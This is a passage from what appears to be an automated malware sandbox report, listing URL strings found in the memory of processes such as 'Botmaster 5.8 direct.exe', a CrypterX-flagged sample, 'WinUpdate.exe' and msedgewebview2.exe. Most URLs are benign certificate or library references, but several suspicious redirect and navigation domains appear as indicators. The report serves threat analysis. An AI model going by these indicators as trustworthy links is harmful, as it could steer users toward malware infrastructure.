                  Source: msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400211000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3657418818.00001B44002AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2569444937.00002DDC00DD0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2567021699.00002DDC0150C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564378630.00002DDC005E8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566304427.00002DDC01548000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2570283052.00002DDC01234000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564490059.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400211000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570018424.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570916979.00001B4400508000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2567101578.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2444055118.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2477239359.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2394075869.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2464321631.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395003417.00001B4400434000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2621450426.00001B440044D000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2388640801.00001B4400452000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2551019821.00001B440044D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2569444937.00002DDC00DD0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2567021699.00002DDC0150C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564378630.00002DDC005E8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566304427.00002DDC01548000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2570283052.00002DDC01234000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564490059.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400211000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570018424.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570916979.00001B4400508000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2444055118.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2477239359.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2394075869.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2464321631.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395003417.00001B4400434000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2621450426.00001B440044D000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2388640801.00001B4400452000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2551019821.00001B440044D000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2379480786.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0
                  Source: msedgewebview2.exe, 00000024.00000003.2331494673.00002454006AC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2416647042.000024540027C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2331129942.00002454006AC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2331129942.0000245400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crrev.com/c/2555698.
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://df.edge.bdkj.bailiana.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://df.edge.qhkj.baicana.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://df.edge.zdkj.ker58.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://df.zm.zdkj.ker58.com
                  Source: msedgewebview2.exe, 00000020.00000003.2397132096.00001B4400804000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2470478995.00004B180113C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2416602382.00004B1800E60000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2463086287.00004B1801118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2455225183.00004B1800E70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2451528199.00004B1800E68000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2455738825.00004B1800E78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dom.spec.whatwg.org/#errors
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dongtaiwang.com/loc/phome.php?v=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dongtaiwang.com/loc/phome.php?v=odo
                  Source: svchost.exe, 0000001B.00000003.2282246046.000002A2C3C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: svchost.exe, 0000001B.00000003.2282246046.000002A2C3C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                  Source: svchost.exe, 0000001B.00000003.2282246046.000002A2C3C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: svchost.exe, 0000001B.00000003.2282246046.000002A2C3C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: svchost.exe, 0000001B.00000003.2282246046.000002A2C3C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: svchost.exe, 0000001B.00000003.2282246046.000002A2C3C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: svchost.exe, 0000001B.00000003.2282246046.000002A2C3C6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: svchost.exe, 0000001B.00000003.2282246046.000002A2C3D27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: msedgewebview2.exe, 00000020.00000003.2622810618.00001B4400804000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2426548696.00004B1802204000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2513975841.00004B180480E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fburl.com/js-libs-www
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://game.whwuyan.cn
                  Source: msedgewebview2.exe, 00000020.00000003.2397132096.00001B4400804000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2470478995.00004B180113C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2416602382.00004B1800E60000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2463086287.00004B1801118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2455225183.00004B1800E70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2451528199.00004B1800E68000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2455738825.00004B1800E78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com/AMorgaut)
                  Source: msedgewebview2.exe, 00000026.00000003.2463086287.00004B1801118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com/julianshapiro/velocity.
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hao123.di178.com/?
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hao123.di178.com/?r916
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hao123kjedge.dh.softby.cn
                  Source: msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3666573945.000030DC00150000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3669480967.000030DC00298000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3664589668.000030DC00104000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                  Source: msedgewebview2.exe, 00000020.00000003.2397132096.00001B4400804000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2416602382.00004B1800E60000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2455225183.00004B1800E70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2451528199.00004B1800E68000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2457349912.00004B18007BC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2455738825.00004B1800E78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jedwatson.github.io/classnames
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jg.wangamela.com/tg
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mini.yyrtv.com/?from=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://navi.anhuiyunci.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://navi.programmea.com
                  Source: msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400211000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3657418818.00001B44002AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: msedgewebview2.exe, 00000020.00000002.3657418818.00001B44002A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3648242608.00001B4400178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2569444937.00002DDC00DD0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2567021699.00002DDC0150C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564378630.00002DDC005E8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566304427.00002DDC01548000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2570283052.00002DDC01234000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564490059.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400211000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570018424.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570916979.00001B4400508000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2567101578.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2444055118.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2477239359.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2394075869.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2464321631.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395003417.00001B4400434000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2621450426.00001B440044D000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2388640801.00001B4400452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0K
                  Source: msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2569444937.00002DDC00DD0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2567021699.00002DDC0150C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564378630.00002DDC005E8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566304427.00002DDC01548000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2570283052.00002DDC01234000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564490059.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400211000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570018424.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570916979.00001B4400508000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2444055118.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2477239359.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2394075869.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2464321631.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395003417.00001B4400434000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2621450426.00001B440044D000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2388640801.00001B4400452000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2551019821.00001B440044D000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2379480786.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0M
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                  Source: msedgewebview2.exe, 0000001D.00000002.3692619147.00002DDC001BC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2436851880.0000245400980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://permanently-removed.invalid/
                  Source: msedgewebview2.exe, 0000001D.00000002.3709381754.00002DDC00FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://permanently-removed.invalid/safebrowsing/clientreport/chrome-certs
                  Source: msedgewebview2.exe, 0000001D.00000002.3690645093.00002DDC0008C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2415876460.0000245400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://permanently-removed.invalid/v1/accountcapabilities:batchGet
                  Source: msedgewebview2.exe, 00000024.00000002.2415876460.0000245400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://permanently-removed.invalid/v1/accountcapabilities:batchGethttps://permanently-removed.invali
                  Source: msedgewebview2.exe, 0000001D.00000002.3695585487.00002DDC0055C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://playinfo.gomlab.com/ending_browser.gom?product=GOMPLAYER
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r.emsoso.cn
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r.jgxqebp.cn
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053224069.000000000308C000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000009.00000002.3640012189.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2157680311.000000000385A000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000013.00000002.2489538224.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, BotMaster.exe, 0000001A.00000002.3650326936.0000000003601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://service.whchenxiang.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sgcs.edge.ker58.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sgkjedge.47gs.com
                  Source: msedgewebview2.exe, 00000026.00000003.2529580323.00004B180119C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiny.jio.com/.
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tx.edge.ker58.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3704048932.00002DDC00B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vi.liveen.vn/p/home.html
                  Source: BotMaster.exe, 0000001A.00000000.2266898531.0000000000DA2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://wa.me/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://web.113989.com/?
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://web.503188.com/?
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.4399.com/flash/32979.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.4399.com/flash/48399.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.4399.com/flash/seer.htm
                  Source: msedgewebview2.exe, 00000020.00000003.2622810618.00001B4400804000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2426548696.00004B1802204000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2513975841.00004B180480E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622810618.00001B4400804000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2426548696.00004B1802204000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2513975841.00004B180480E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: msedgewebview2.exe, 0000001D.00000002.3696502178.00002DDC0063C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
                  Source: msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2569444937.00002DDC00DD0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2567021699.00002DDC0150C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564378630.00002DDC005E8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566304427.00002DDC01548000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2570283052.00002DDC01234000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564490059.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400211000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570018424.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570916979.00001B4400508000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2444055118.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2477239359.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2394075869.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2464321631.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395003417.00001B4400434000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2621450426.00001B440044D000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2388640801.00001B4400452000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2551019821.00001B440044D000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2379480786.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400211000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3657418818.00001B44002AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dinoklafbzor.org
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: BotMaster.exe, 0000001A.00000002.3732540068.0000000007AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
